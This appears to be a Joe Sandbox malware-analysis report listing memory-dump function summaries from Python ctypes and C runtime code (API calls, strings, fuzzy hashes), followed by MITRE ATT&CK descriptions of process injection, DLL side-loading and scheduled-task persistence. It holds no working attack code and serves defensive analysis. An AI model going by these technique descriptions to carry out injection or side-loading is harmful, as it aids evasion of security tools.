Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_String
String ID: NULL pointer access$Pointer does not support item deletion
API String ID: 1450464846-1262937747
Opcode ID: cc63e7bd2d2a3bc22265ebdaaeb10ee6e24a6e51b4ebc2f3b89706aefd929760
Instruction ID: 77e1079486600dfbe8246f086516a8b5e73a71d4ba4fbeb40a3b8eb7460ee462
Opcode Fuzzy Hash: cc63e7bd2d2a3bc22265ebdaaeb10ee6e24a6e51b4ebc2f3b89706aefd929760
Instruction Fuzzy Hash: 6E013961A08B8681EA549F5AA8904BA2368BF8AFD4F116132EE4D977A5CE3CD554C300

Function 00007FF8B93CE98C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B93CEA24: PyType_IsSubtype.PYTHON311(?,?,?,?,00007FF8B93CE889), ref: 00007FF8B93CEA31

PyErr_SetString.PYTHON311 ref: 00007FF8B93CE9C8

Part of subcall function 00007FF8B93CAA7C: PyErr_SetString.PYTHON311(?,?,?,?,00007FF8B93C947D,?), ref: 00007FF8B93CAABD

Strings

not a ctype instance, xrefs: 00007FF8B93CE9B7
can't delete attribute, xrefs: 00007FF8B93CE9E0

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_String$SubtypeType_
String ID: can't delete attribute$not a ctype instance
API String ID: 3320257282-2740123057
Opcode ID: 18fbc3005ffdff5a035a76096331e82b7bdea77d6c35e831de142f80868fa9ec
Instruction ID: c08fd5fd9d6539c87d98c96dc8cf11231822ac2b214f198cffc02d3eab865635
Opcode Fuzzy Hash: 18fbc3005ffdff5a035a76096331e82b7bdea77d6c35e831de142f80868fa9ec
Instruction Fuzzy Hash: FB112765A08F8181EB60CF1AE44006A67B4FF4CFE4B106132EF9D53BA8DF2CE9648700

Function 00007FF8B93C9638 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

PySequence_SetItem.PYTHON311 ref: 00007FF8B93C9677
PyErr_SetString.PYTHON311 ref: 00007FF8B93C96A3

Strings

args not a tuple?, xrefs: 00007FF8B93C9699

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_ItemSequence_String
String ID: args not a tuple?
API String ID: 138718260-274370407
Opcode ID: f981f7e703dfeb18ac4443360c7dfc39ae4566ed3aa42caf66e0419349738e14
Instruction ID: d456f236ec457976eceeaf0eb34810235da2dec34bdda123cab9a88f4cdffdc9
Opcode Fuzzy Hash: f981f7e703dfeb18ac4443360c7dfc39ae4566ed3aa42caf66e0419349738e14
Instruction Fuzzy Hash: AC018C21B08F8285E6508F19E45006A6360FB49FE0F59A231EB6D577A5CF28D5A5C300

Function 00007FF8B93C9414 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93C9490

Strings

Array does not support item deletion, xrefs: 00007FF8B93C942A
invalid index, xrefs: 00007FF8B93C9486

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_String
String ID: Array does not support item deletion$invalid index
API String ID: 1450464846-799983634
Opcode ID: 67e0225e1662b2c6de7c64aa0e1a7725335fd733c618b52c26417df970fd658a
Instruction ID: e5b50d4de38ff199332783f7a8680cd13f94c987ff1c8b92d0ef8d0b84add6ee
Opcode Fuzzy Hash: 67e0225e1662b2c6de7c64aa0e1a7725335fd733c618b52c26417df970fd658a
Instruction Fuzzy Hash: E1014C61A08F8A91DA50DF4AE86087A2378FF99BC0F422172EB4D53361DF2DD518C300

Function 00007FF8B93C4680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311(?,?,?,00007FF8B93C1959), ref: 00007FF8B93C8EE9

Part of subcall function 00007FF8B93C3DC0: _PyObject_New.PYTHON311(?,?,?,?,00007FF8B93C46A2,?,?,?,00007FF8B93C1959), ref: 00007FF8B93C3DCB

_Py_Dealloc.PYTHON311(?,?,?,00007FF8B93C1959), ref: 00007FF8B93C8EF4

Strings

expected CData instance, xrefs: 00007FF8B93C8EDF

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: DeallocErr_Object_String
String ID: expected CData instance
API String ID: 3982460303-1581534645
Opcode ID: cb84d01ecd15a1eda4d8d1b175decd3e5ebb0d94a1c0848139c17e093e1ac344
Instruction ID: e0c6afe564a41d5c210b32deaa12645ab727e76b70a8eb3abd0fa321c8850fec
Opcode Fuzzy Hash: cb84d01ecd15a1eda4d8d1b175decd3e5ebb0d94a1c0848139c17e093e1ac344
Instruction Fuzzy Hash: 7B012861A09F8A91EA649F2DA85413A23B4AF4DBC4F142430CA1E46760DF3CE1598314

Function 00007FF8B93CB4F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PyObject_GenericSetAttr.PYTHON311 ref: 00007FF8B93CB510
_PyUnicode_EqualToASCIIString.PYTHON311 ref: 00007FF8B93CB539

Strings

_fields_, xrefs: 00007FF8B93CB52F

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AttrEqualGenericObject_StringUnicode_
String ID: _fields_
API String ID: 947992268-3196300388
Opcode ID: c6dedb99678c499afd6badd1b017026620a4ab54dad84f9f25f416736ac5017a
Instruction ID: f56bf529a91084209d612fb159a0f06116c17d6281b4a678dc73837befefdfb1
Opcode Fuzzy Hash: c6dedb99678c499afd6badd1b017026620a4ab54dad84f9f25f416736ac5017a
Instruction Fuzzy Hash: 56F0F421B1CBC641EB509F3EA54426B5674EF4DFD0F58A130DB5E46698CE2CE599C700

Function 00007FF8B93CB2A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON311 ref: 00007FF8B93CB2D3
_PyDict_SetItemId.PYTHON311 ref: 00007FF8B93CB300

Strings

abstract class, xrefs: 00007FF8B93CB2C9

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Dict_Err_ItemString
String ID: abstract class
API String ID: 960913676-1623945838
Opcode ID: 152bc656983328e65481e0599e2526a4dd7c8e873d35052210cfab64f93eb631
Instruction ID: b87d2033201f55771ad64fa83c728bee8894f1a19f0d677460f0f8e28b6b635f
Opcode Fuzzy Hash: 152bc656983328e65481e0599e2526a4dd7c8e873d35052210cfab64f93eb631
Instruction Fuzzy Hash: 24F0F450A08B8A81EA649F7EF8940791374EF4EBD4B547131DB1E467A5DE2CD499C300

Function 00007FF8B93CC33C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

PySys_Audit.PYTHON311 ref: 00007FF8B93CC360
PyBytes_FromStringAndSize.PYTHON311 ref: 00007FF8B93CC387

Strings

ctypes.string_at, xrefs: 00007FF8B93CC359

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AuditBytes_FromSizeStringSys_
String ID: ctypes.string_at
API String ID: 1783689829-1910480597
Opcode ID: ad0ccf7f71804dd0e038b4a23bae58c0fa799e11b1e17efbe4fa3c6d44ce38ba
Instruction ID: e112523ac95339db7d0094095fed792cf12831c30c6e313323a23d376bed33a4
Opcode Fuzzy Hash: ad0ccf7f71804dd0e038b4a23bae58c0fa799e11b1e17efbe4fa3c6d44ce38ba
Instruction Fuzzy Hash: 2AF030A1B08AC691EB604F29B9511792665AF5DBE4F187731DA3E465D4DE1CD0889300

Function 00007FF8B93CC398 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

PySys_Audit.PYTHON311 ref: 00007FF8B93CC3BC
PyUnicode_FromWideChar.PYTHON311 ref: 00007FF8B93CC3E4

Strings

ctypes.wstring_at, xrefs: 00007FF8B93CC3B5

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: AuditCharFromSys_Unicode_Wide
String ID: ctypes.wstring_at
API String ID: 614261396-2169766756
Opcode ID: c82b687e7251797f6e5b90717e26ccc800462a1ff5413f444b11774fb9a74885
Instruction ID: 1b704576026390e2e003febfa1ada75e8ec14ec5e2c041ac316f3d6cf2ea40f5
Opcode Fuzzy Hash: c82b687e7251797f6e5b90717e26ccc800462a1ff5413f444b11774fb9a74885
Instruction Fuzzy Hash: 0FF0E960B18A8291EE200F29F9A10B96260AF0DBF4F487731DB3E861E0DD6CD0448300

Function 00007FF8B93C2470 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON

Download Yara Rule

APIs

PyLong_FromSsize_t.PYTHON311 ref: 00007FF8B93C248E

Strings

this type has no size, xrefs: 00007FF8B93C7308

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: FromLong_Ssize_t
String ID: this type has no size
API String ID: 168540982-982649334
Opcode ID: 6f14cdcc885872a6a1df23694bcedff85d145f2805944da9bd946685c2c050ae
Instruction ID: 98f595dc110e51370d40f5cce550baa95247c6da967b8808d58e0bdbd76d544c
Opcode Fuzzy Hash: 6f14cdcc885872a6a1df23694bcedff85d145f2805944da9bd946685c2c050ae
Instruction Fuzzy Hash: 23F0AC91B19A8792EB649F6A99A107A23749F8DFC4F153031DF0E8A265DE2CE4888354

Function 00007FF8B9F6EE00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8B9F6F050: _IsNonwritableInCurrentImage.LIBCMT ref: 00007FF8B9F6F110
Part of subcall function 00007FF8B9F6F050: RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF8B9F6EE15), ref: 00007FF8B9F6F15F

Part of subcall function 00007FF8B9F669C0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF8B9F625CE), ref: 00007FF8B9F669CE

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B9F6EE3A

Strings

f, xrefs: 00007FF8B9F6EE15
csm, xrefs: 00007FF8B9F6EE1B

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: CurrentImageNonwritableUnwindabortterminate
String ID: csm$f
API String ID: 4189928240-629598281
Opcode ID: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
Instruction ID: 1f2a757dade356547fee75c717728de517120dda1691d4a15e8509c4fe004554
Opcode Fuzzy Hash: 41dc89b1ce5f079b65ce2aaee024a8a434243f0f20765bf48ba2e403aae6c5bc
Instruction Fuzzy Hash: 75E030629087C281EB206FA5E18513D2AA5AF16BE5F19A034DB8806746CF3DD4B8C741

Function 00007FF8B93CDDFC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

_PyUnicode_IsPrintable.PYTHON311(?,?,?,00007FF8B93CD3BD), ref: 00007FF8B93CDE12

Strings

', xrefs: 00007FF8B93CDE21
\, xrefs: 00007FF8B93CDE1C

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: PrintableUnicode_
String ID: '$\
API String ID: 1291510985-1366717710
Opcode ID: 8f056e593a683e8d15de34f78a6f47cb157d5505191b12e7d535d23602ebe9e6
Instruction ID: 199893741143d3bac8e85d26f4c0b519de14f0ab57857f32e7a5b23386fb2ace
Opcode Fuzzy Hash: 8f056e593a683e8d15de34f78a6f47cb157d5505191b12e7d535d23602ebe9e6
Instruction Fuzzy Hash: 54E08621F18F8746FB742E3DB88427612A25B9D7E0F4E3131EB69052D9CD2CE8C95714

Function 00007FF8B93CE940 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

PyUnicode_FromFormat.PYTHON311 ref: 00007FF8B93CE96E

Strings

<Field type=%s, ofs=%zd, size=%zd>, xrefs: 00007FF8B93CE979
<Field type=%s, ofs=%zd:%zd, bits=%zd>, xrefs: 00007FF8B93CE962

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: FormatFromUnicode_
String ID: <Field type=%s, ofs=%zd, size=%zd>$<Field type=%s, ofs=%zd:%zd, bits=%zd>
API String ID: 3889672380-2914491812
Opcode ID: 08e4dafb61acecda0dd77ce9d4e7f7947246ca23280beaed436fd91f997484e9
Instruction ID: 7c17523821f52ce358345d361c81e9415449897088d4bcc6ac058fc47f943bfe
Opcode Fuzzy Hash: 08e4dafb61acecda0dd77ce9d4e7f7947246ca23280beaed436fd91f997484e9
Instruction Fuzzy Hash: F5E0E566A04A85C2DB648F0DD8504693725FF5AF98BA52166CB4C03370CF38D9AAD790

Function 00007FF8B93C3DF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON311 ref: 00007FF8B93C8A90
PyErr_SetString.PYTHON311 ref: 00007FF8B93C8AAC

Strings

PyObject is NULL, xrefs: 00007FF8B93C8AA2

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Err_$OccurredString
String ID: PyObject is NULL
API String ID: 114435612-3221357749
Opcode ID: 2e5002b93a88984c719b4076089918ef8885b05004490f6185a51e22d0327163
Instruction ID: dee4d33f690824c84ee76b6ccd5a558ba32d887ada3faf7049cc5621677d67dc
Opcode Fuzzy Hash: 2e5002b93a88984c719b4076089918ef8885b05004490f6185a51e22d0327163
Instruction Fuzzy Hash: 5EE04F20A0AA8791EE504F2DD85003923B0BF4DFC4F546439C70E06320DE2CE0498300

Function 00007FF8B93CDEB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

PyCapsule_GetPointer.PYTHON311 ref: 00007FF8B93CDEC3
PyMem_Free.PYTHON311 ref: 00007FF8B93CDED1

Strings

_ctypes pymem, xrefs: 00007FF8B93CDEBC

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Capsule_FreeMem_Pointer
String ID: _ctypes pymem
API String ID: 1268649101-201515578
Opcode ID: 62ef90d10503a54e82f353289ff9a1ab72bad7d0f7bb64e3368930f79f513158
Instruction ID: 624fd62250bed94796bc830e0088998aa3da75ee9dc110c467860fcad605951b
Opcode Fuzzy Hash: 62ef90d10503a54e82f353289ff9a1ab72bad7d0f7bb64e3368930f79f513158
Instruction Fuzzy Hash: 78C01210E0A7C682ED586F59AC940301364AF0DF85F842034C70D01220DE2C6059C300

Function 00007FF8B93CF3B4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

PyCapsule_GetPointer.PYTHON311 ref: 00007FF8B93CF3BF
PyMem_Free.PYTHON311 ref: 00007FF8B93CF3CD

Strings

_ctypes/cfield.c pymem, xrefs: 00007FF8B93CF3B8

Memory Dump Source

Source File: 00000007.00000002.2088129467.00007FF8B93C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B93C0000, based on PE: true

Associated: 00000007.00000002.2088094009.00007FF8B93C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088170487.00007FF8B93D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088209313.00007FF8B93D7000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.2088245631.00007FF8B93DB000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b93c0000_lib.jbxd

Similarity

API ID: Capsule_FreeMem_Pointer
String ID: _ctypes/cfield.c pymem
API String ID: 1268649101-2578739719
Opcode ID: 13f5c1952ace5f4f8c9f181e4b2ebf5f0c2b934a391285e14cb501e27f568ab5
Instruction ID: 26c689de29b9206359dfbf852ecd39bd23cd031e89b73cf7e79dbb9ff9f181cd
Opcode Fuzzy Hash: 13f5c1952ace5f4f8c9f181e4b2ebf5f0c2b934a391285e14cb501e27f568ab5
Instruction Fuzzy Hash: ECC01210E0E78692ED585F59A85413413659F0DF84F942074C60D05220DE6C65998300

Function 00007FF8B9F669DC Relevance: 5.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF8B9F66859,?,?,?,?,00007FF8B9F6FF42,?,?,?,?,?), ref: 00007FF8B9F669FB
SetLastError.KERNEL32(?,?,?,00007FF8B9F66859,?,?,?,?,00007FF8B9F6FF42,?,?,?,?,?), ref: 00007FF8B9F66A84

Memory Dump Source

Source File: 00000007.00000002.2088453756.00007FF8B9F61000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9F60000, based on PE: true

Associated: 00000007.00000002.2088414184.00007FF8B9F60000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088510059.00007FF8B9F71000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088589734.00007FF8B9F76000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000007.00000002.2088624293.00007FF8B9F77000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8b9f60000_lib.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
Instruction ID: 6b73819ffcf9f3d9335c1f5c17b3be44fb95b21d629e69d6decf4ccf6fad0997
Opcode Fuzzy Hash: bbe9895d534b658101cce7e74ca5bd95b80ee12bf15f37732e53d0ee5c009e2b
Instruction Fuzzy Hash: 34110020F097C282FA549FA9E84413526A5BF49BF2F189638DB6E077D9DE2CB841C600

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
